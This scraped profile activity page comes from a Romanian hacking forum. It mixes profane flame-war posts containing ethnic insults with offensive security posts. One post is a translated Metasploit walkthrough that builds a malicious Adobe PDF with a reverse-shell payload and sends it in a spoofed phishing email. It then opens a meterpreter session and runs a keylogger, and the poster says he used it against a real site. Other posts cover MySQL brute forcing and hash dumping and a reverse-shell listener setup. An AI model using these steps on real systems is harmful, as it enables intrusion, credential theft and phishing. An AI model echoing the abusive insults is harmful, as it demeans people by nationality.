-
Posts
180 -
Joined
-
Last visited
-
Days Won
3
neo.hapsis last won the day on June 8 2012
neo.hapsis had the most liked content!
Converted
-
Location
-backtrack-
Recent Profile Visitors
The recent visitors block is disabled and is not being shown to other users.
neo.hapsis's Achievements
Newbie (1/14)
61
Reputation
-
Am tot respectul pentru tine Tex dar nu inteleg motivul de ce le ai inchis threadul , mai barfeam si noi.. Dar chiar nu inteleg de ce le-ati scos pisatul de Kabron din functia moderator. Candva aproape era dusmanul RST cu aberatile lui acuma a ajuns moderator precum si pisatul de RipKid. Daca stafful a avut nevoie de pisati ca ei,sigur ca le-au meritat intrun mod si acuma au puterea in mana. Motoul RST : prezen?a pe acest forum este un privilegiu, nu un drept. Respecta-l! @Kabron Daca ai stii cine e tedeus ai respecta mult mai mult decat sa dai un warn sau kick! @Tex ...cum era titlul la thread dupa mine este OKE(marca RST).VOI le ati permis sa faca cea ce faci.VOI STAFFUL nimeni altul. U.I Imi place la nebunie offtopicurile:D
-
@Cuddlybunny te ignor ca esti prea mic pentru p***a mea. @Acidrip Mass media manipuleaza un mucos de 13 anisori? hai bre .Copii sunt oglinda parintilor.
-
La Multi Ani la toata lume!
-
Asa dupa o cautare rapida de 20 de secunde. Si astia sunt tigani nu romanii?? Germania : Român c?utat pentru furt de autorit??ile din Germania, prins la Vama Por?ile de Fier I | adevarul.ro Germania: Talhar roman, prins gratie ADN-ului de pe o felie de salam Spania: Roman arestat spania crima Roman arestat aeroport madrid Italia: Un roman prins la furat in Italia a facut un scandal monstru - VIDEO un roman prins in italia - Stiri... | Romania TV | RTV.net U.I Tu nu ai nici o vina numai parinti tai, ca ei te-au crescut asa cu ura si cu dispretuire.
-
Mr.SNQ I didn't tried resolve this challenge because XSS attack is not my skill. Why are you banned? @Gecko ar ajunge si un IP din partea adminilor macar sa jucam la el un pic:)) It's good for you ?
-
@drk3stone de ce ai pus titlul sql inject cand eu nu vad nici o eroare de sql pe acolo + dai o bere:)) ...accesul la acel site valoreaza mai mult decit o bere ....ridica suma si poate sare careva! Hai incarca-mi contul cu 1.000 Eu si iti dau o bere! @Sintax cum sa le pune in sectiunea challenge cand nu are Prof
-
1. De ce credeai ca nu mai iese pisatule? 2. Te bucuri acuma hm si vrei ajutor de la el pisatule? Dar erai intre membrii care incercu sa adune ceva donatie? Ai ridicat si tu mana ca dai ceva pe acolo? Futu-va in gura pe totii pisati care acuma apar ca ciupercile dupa ploaie, dar cand Marian avea nevoie de "ceva" numai membri "hackyard" era langa el.Pfffui pisatilor Hai wildchild faci treaba de moderator...pana cand nu te injur si pe tine.!
-
Thanks for challenge
-
OFFTOPIC ca la clubbshow-ul asta de la Pishti reloaded nu am ce commenta ON. Mi-a venit si timpul meu sa comentez in threadul "clubshowoff kicked unguru" . @BlackWorld fututi mortii m**** de b*zg*r tu nu vezi ce faci? Cand vad un prost ca tine imi e rusine ca sunt ungur. Ai intrat intr-o comunitate, primul lucru care trebuie sa-le faci : citesti regulamentul macar de 3 ori. Ca sa-le intelegi bine regulamentul (ca esti prost) si cum vad nu cunosti nici limba tarii (un ecou nemuritor) ,citeste macar de 10 ori. Cand comenteaza cineva in threadul tau, indiferent ca e de bine sau de rau,prima data uita-te cate postare are cine ti-a comentat threadul ,de cand este membru si ce reputatie are.Dupa care iti vei da seama ca totii au mai multa vechime decit tu cu toate familia ta la un loc,sa numai vorbesc si de reputatii. Primele 5 persoane nu te au inteles ,nici in ce limba scrii [ te gandesti ca poate ei sunt cu mintea mai intunecata] dar cind si a 6-lea persoana tot nu intelege, taci dracului si repede editeza postul (vazind ca oameni nu inteleg nimic cea ce ai pisat tu pe acolo) Un sfat bun de la mine "daca nu stii limba tarii unde traiesti fa-ti bagajul si fugi dracului peste Carpati direct in Ungaria. Ajungand acolo sigur ca iti arunca in cap dute inapoi in romania (si asa vei face naveta intre 2 tarii pina cand te vei satura). @reberock si @R3Flux Va bat in gura cu pula mea pina ca nd mamele voastre mi-o cere sa-io dau si lor. Incultura ta si persoanele de genul tau (motiv prt care am cetatenie dubla se gaseste peste tot,chiar si in Italia Stand in Italia dupa 3 luni imi era rusine ca sunt roman, ca oameni de genul tau a facut de rusine Romaniei.(jaf,viol,crime etc) @nosph3rat bolangiul de la SRI tu mai ai acces la RST? Ai reputatie de 6 de unde ?
-
Pentru a demonstra puterea si modul MSF cum pot fi folosite in "client side" atac voi folosi o poveste.În lumea de securitate, de inginerie social? a devenit un vector de atac ce în ce mai utilizate. Chiar dac? tehnologiile se schimb?, un lucru care pare s? r?mân? acela?i lucru este lipsa de "securitate cu oamenii". Datorit? faptului c?,inginerie social? a devenit un foarte "fierbinte" subiect în lumea securitati. În scenariul nostru primul lucru care a fost de a culege o multime de informa?ii folosind instrumente, cum ar fi in cadru Metasploit, Maltego ?i alte instrumente pentru a aduna adrese de e-mail si informatii pentru a lansa un atac client side pe victima. Dup? o scufundare in tomberonul informatiilor ?i cautari dupa email-uri de pe web, am gasit dou? informa?ii importante despre tinta. 1) Ei folosesc "Best Computers" pentru servicii tehnice. 2) Departamentul IT are o adres? de e-mail a itdept@victim.com Dorim s? uplodam shell pe calculatorul departamentului IT ?i executa un key-logger pentru a ob?ine parole, Intel sau orice alte informatii. Vom începe prin înc?rcarea msfconsole nostru. Dupa ce le-am sunt înc?rcate, cream un fisier PDF malitios care ne ofera o portita in securitate tintei. Pentru a face acest lucru, trebuie s? apar? legitim, au un titlu care este realist, si sa nu fie semnalizat de anti-virus sau alt software de alert? de securitate. Vom utiliza Adobe Reader 'util.printf()' JavaScript Function Stack Buffer Overflow Vulnerability. Adobe Reader este predispus la un stack-based buffer overflow vulnerabilitate, deoarece-cererea nu reu?e?te s? efectueze controale adecvate de frontier? de pe ghidul de-a furnizat datele. Un atacator poate exploata aceast? problem? pentru a executa cod arbitrar cu privilegiile utilizatorului care ruleaz? aplica?ia sau accident cererii, negând serviciu pentru utilizatorii legitim. Deci, vom începe prin crearea nostru de fisier malware PDF pentru a fi utilizate în acest atac "client -side". msf > use exploit/windows/fileformat/adobe_utilprintf msf exploit(adobe_utilprintf) > set FILENAME BestComputers-UpgradeInstructions.pdf FILENAME => BestComputers-UpgradeInstructions.pdf msf exploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(adobe_utilprintf) > set LHOST 192.168.8.128 LHOST => 192.168.8.128 msf exploit(adobe_utilprintf) > set LPORT 4455 LPORT => 4455 msf exploit(adobe_utilprintf) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- FILENAME BestComputers-UpgradeInstructions.pdf yes The file name. OUTPUTPATH /pentest/exploits/framework3/data/exploits yes The location of the file. Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process LHOST 192.168.8.128 yes The local address LPORT 4455 yes The local port Exploit target: Id Name -- ---- 0 Adobe Reader v8.1.2 (Windows XP SP3 English) Dup? ce vom seta toate op?iunile stabilite modul în care dorim, vom rula "exploit" pentru a crea fisierul malitios. msf exploit(adobe_utilprintf) > exploit [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Creating 'BestComputers-UpgradeInstructions.pdf' file... [*] Generated output file /pentest/exploits/framework3/data/exploits/BestComputers-UpgradeInstructions.pdf [*] Exploit completed, but no session was created. msf exploit(adobe_utilprintf) > Deci, putem vedea c? fisierul nostru în format PDF a fost creat într-un sub-director de unde suntem. Deci, haide?i s? copiam in directorul nostru / tmp deci este mai u?or de a localiza mai târziu în exploit nostru. Înainte de a ne trimite fisier malware pentru victima noastr? avem nevoie pentru a configura un ascult?tor pentru a captura aceast? conexiune invers?. Vom folosi msfconsole s? înfiin?eze ascult?torul nostru pentru manipulare. msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LPORT 4455 LPORT => 4455 msf exploit(handler) > set LHOST 192.168.8.128 LHOST => 192.168.8.128 msf exploit(handler) > exploit [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Starting the payload handler... Acum, c? ascult?torul nostru este în a?teptare pentru a primi sarcina sa util?, r?u inten?ionat trebuie numai s? le livram la victima ?i deoarece în culegerea de informa?ii noastr? am ob?inut adresa de e-mail a departamentului de IT, vom folosi un script la îndemân? mic numit sendEmail pentru a oferi aceast? sarcin? util? pentru a victim?. Cu un kung-fu-o linie, se poate ata?a PDF malitios, utilizam orice server SMTP dorim ?i s? scriem un e-mail destul de conving?toare de la orice adres? vrem .... root@bt:~# sendEmail -t itdept@victim.com -f techsupport@bestcomputers.com -s 192.168.8.131 -u Important Upgrade Instructions -a /tmp/BestComputers-UpgradeInstructions.pdf Reading message body from STDIN because the '-m' option was not used. If you are manually typing in a message: - First line must be received within 60 seconds. - End manual input with a CTRL-D on its own line. IT Dept, We are sending this important file to all our customers. It contains very important instructions for upgrading and securing your software. Please read and let us know if you have any problems. Sincerely, Best Computers Tech Support Aug 24 17:32:51 bt sendEmail[13144]: Message input complete. Aug 24 17:32:51 bt sendEmail[13144]: Email was sent successfully! Dup? cum putem vedea aici, script-ul ne permite s? afi?ezi orice DIN (-f), adresa de orice TO (-t), orice SMTP (-e) serverul, precum ?i titlurile (-u) ?i ata?amentul nostru malware (-a ). Odat? ce vom face tot ceea ce vrem, apasam enter putem scrie orice mesaj ne-o dorim, apoi ap?sam CTRL + D ?i acest lucru va trimite e-mail pentru a victimei. Acum pe masina victimei, IT angajat al Departamentul de Securitate este obtinerea softwarelor la zi el verifica e-mail lui. El vede ca este un document foarte important isi copiaz? pe desktop-ul lui (ca el face întotdeauna) astfel încât el poate scana acest lucru cu program anti-virus. Dup? cum putem vedea, acesta a trecut cu brio si VICTIMA noastra este dispus s? deschid? acest fi?ier pentru a pune în aplicare rapida acest upgrade-uri foarte importante. F?când clic pe fi?ierul se deschide Adobe, dar prezinta o fereastr? în gri, care nu dezv?luie un PDF. În schimb, conexiunea inversa se executa pe masina victimei. [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Starting the payload handler... [*] Sending stage (718336 bytes) session[*] Meterpreter session 1 opened (192.168.8.128:4455 -> 192.168.8.130:49322) meterpreter > Avem acum o coaj? de pe computerul lor printr-un atac r?u inten?ionat PDF client side attack. Desigur, ceea ce ar fi în?elept în acest moment este de a muta coaj? (shell) într-un proces diferit, asa ca atunci cand ei se ucid Adobe nu ne pierdem shellul nostru. Apoi vom ob?ine informa?ii de sistem, începem un key-logger ?i de a continua exploatarea re?elei. meterpreter > ps Process list ============ PID Name Path --- ---- ---- 852 taskeng.exe C:\Windows\system32\taskeng.exe 1308 Dwm.exe C:\Windows\system32\Dwm.exe 1520 explorer.exe C:\Windows\explorer.exe 2184 VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe 2196 VMwareUser.exe C:\Program FilesVMware\VMware Tools\VMwareUser.exe 3176 iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe 3452 AcroRd32.exe C:\Program Files\AdobeReader 8.0\ReaderAcroRd32.exe meterpreter > run post/windows/manage/migrate [*] Running module against V-MAC-XP [*] Current server process: svchost.exe (1076) [*] Migrating to explorer.exe... [*] Migrating into process ID 816 [*] New server process: Explorer.EXE (816) meterpreter > sysinfo Computer: OFFSEC-PC OS : Windows Vista (Build 6000, ). meterpreter > use priv Loading extension priv...success. meterpreter > run post/windows/capture/keylog_recorder [*] Executing module against V-MAC-XP [*] Starting the keystroke sniffer... [*] Keystrokes being saved in to /root/.msf3/loot/20110323091836_default_192.168.1.195_host.windows.key_832155.txt [*] Recording keystrokes... root@bt:~# cat /root/.msf3/loot/20110323091836_default_192.168.1.195_host.windows.key_832155.txt Keystroke log started at Wed Mar 23 09:18:36 -0600 2011 Support, I tried to open ti his file 2-3 times with no success. I even had my admin and CFO tru y it, but no one can get it to p open. I turned on the rmote access server so you can log in to fix our p this problem. Our user name is admin and password for that session is 123456. Call or eme ail when you are done. Thanks IT Dept Tradus de mine de la Sursa : Client Side Attacks - Metasploit Unleashed Inspirat din tutorialul de mai sus am folosit atacul la https://rstcenter.com/forum/55239-unkn0wn-www-fsconsult.rst
-
Metasploit provide some MySQL database auxiliary modules who will permit you to scan the running version, do brute force login, execute sql queries and gather some useful informations. You can find all these auxiliary modules through the Metasploit search command. MySQL version scanner (mysql_version) To invoke this auxiliary module just type the following command : Just provide the target address range to the “RHOSTS” variable. “RHOSTS” variable could be an unique IP address, an IP addresses range (ex : 192.168.1.0-192.168.1.255, or 192.168.1.0/24) or a file (file:/tmp/ip_addresses.txt). In order to parallelize version scans, just increase the number of concurrent threads by setting the “THREADS” variable. MySQL authentication brute force login (mysql_login) To invoke this auxiliary module just type the following command : This module attempts to authenticate against a MySQL instance using username and password combinations indicated by the “USER_FILE“, “PASS_FILE“, and “USERPASS_FILE” options. Metasploit doesn’t provide default “USER_FILE“, default “PASS_FILE” and default “USERPASS_FILE“. You can use SkullSecurity password lists, or my own list how is updated regularly. In order to parallelize brute force attempts, just increase the number of concurrent threads by setting the “THREADS” variable. Provide the target address range to the “RHOSTS” variable. “RHOSTS” variable could be a an unique IP address, an IP addresses range or a file. Valid login attempts are displayed in green and non valid in red. MySQL generic SQL query execution (mysql_sql) To invoke this auxiliary module just type the following command : This module will allow you to execute a simple SQL query against a MySQL instance. The default SQL query will check the running version of MySQL database. You will require valid login and password previously discovered with the “mysql_login” auxiliary module. Provide the target serveur to the “RHOST” variable. “RHOST” variable should be an unique IP address. Some useful SQL MySQL queries for pen testing are available on pentestmonkey website. MySQL password hashdump (mysql_hashdump) To invoke this auxiliary module just type the following command : Provide the target address range to the “RHOSTS” variable. “RHOSTS” variable could be an unique IP address, an IP addresses range (ex : 192.168.1.0-192.168.1.255, or 192.168.1.0/24) or a file (file:/tmp/ip_addresses.txt). In order to parallelize scans, just increase the number of concurrent threads by setting the “THREADS” variable. You also need to have valid “USERNAME” and “PASSWORD“, maybe obtained through the “mysql_login” auxiliary module. MySQL enumeration (mysql_enum) To invoke this auxiliary module just type the following command : This auxiliary module will allow you to gather useful informations from a MySQL server : The MySQL version The MySQL OS compilation target The server architecture The server hostname The MySQL datas directory location If logging of queries and logins is activated or not, and log files location If the old password hashing algorithm support is activated or not If local files loading (infile) is activated or not If logins with old Pre-4.1 passwords is authorized or not If the “–skip-grant-tables” option is activated or not If symlinks are authorized to be used for database files If table merges are allowed If the “–safe-show-database” option is activated or not If SSL connexions are enabled or not All accounts with their password hashes List of accounts that can log in with SSL if SSL is enabled List of all accounts with “GRANT“, ”CREATE USER”, “RELOAD“, ”SHUTDOWN“, “SUPER“, “FILE” and “PROCESS” privileges. List of all accounts with “SELECT“, “INSERT“, “UPDATE“, “DELETE“, “CREATE” and “DROP” privileges. List of all anonymous accounts. List of all accounts without passwords List of all accounts with host wildcard authorized access. To use this auxiliary module you need to have a access to the database with a privileges user account, maybe gathered with the “mysql_login” auxiliary module. Provide the target serveur to the “RHOST” variable. “RHOST” variable should be an unique IP address.
-
Testul este prea usor ma gandeam ca este ceva mai complicat!
-
Nu stiu cum le creez shellul ,imi merge perfect si cu armitage! Daca nu le poti rezolva contacteaza ma pe ID-ul meu!
-
URMEAZA PAS cu PAS msfconsole -n use exploit/multi/handler set PAYLOAD php/meterpreter/reverse_tcp set LHOST 0.0.0.0 set LPORT 443 exploit Acum dute pe linkul care ti-am trimis in PM si spune-mi daca te ai conectat!